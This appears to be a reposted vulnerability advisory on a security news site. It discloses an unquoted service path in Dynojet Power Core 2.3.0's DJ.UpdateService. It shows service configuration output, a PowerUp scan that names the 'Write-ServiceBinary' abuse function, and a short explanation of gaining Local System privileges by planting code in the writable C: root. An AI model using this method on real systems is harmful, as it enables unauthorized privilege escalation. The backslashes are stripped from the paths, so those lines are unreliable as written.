Exploit/Advisories no image

Published on November 3rd, 2021 📆 | 3126 Views ⚑

0

Dynojet Power Core 2.3.0 Unquoted Service Path – Torchsec

# Exploit Title: Dynojet Power Core 2.3.0 – Unquoted Service Path
# Exploit Author: Pedro Sousa Rodrigues (https://www.0x90.zone/ / @Pedro_SEC_R)
# Version: 2.3.0 (Build 303)
# Date: 30.10.2021
# Vendor Homepage: https://www.dynojet.com/
# Software Link: https://docs.dynojet.com/Document/18762
# Tested on: Windows 10 Version 21H1 (OS Build 19043.1320)

SERVICE_NAME: DJ.UpdateService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program FilesDynojet Power CoreDJ.UpdateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DJ.UpdateService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
PS C:UsersDeveloper> Get-UnquotedService

ServiceName : DJ.UpdateService
Path : C:Program FilesDynojet Power CoreDJ.UpdateService.exe
ModifiablePath : @{ModifiablePath=C:; IdentityReference=NT AUTHORITYAuthenticated Users;
Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name ‘DJ.UpdateService’ -Path
CanRestart : True
Name : DJ.UpdateService

ServiceName : DJ.UpdateService
Path : C:Program FilesDynojet Power CoreDJ.UpdateService.exe
ModifiablePath : @{ModifiablePath=C:; IdentityReference=NT AUTHORITYAuthenticated Users; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name ‘DJ.UpdateService’ -Path
CanRestart : True
Name : DJ.UpdateService

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path (depending on the installation path). The service might be executed manually by any Authenticated user. If successful, the local user’s code would execute with the elevated privileges of Local System.

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *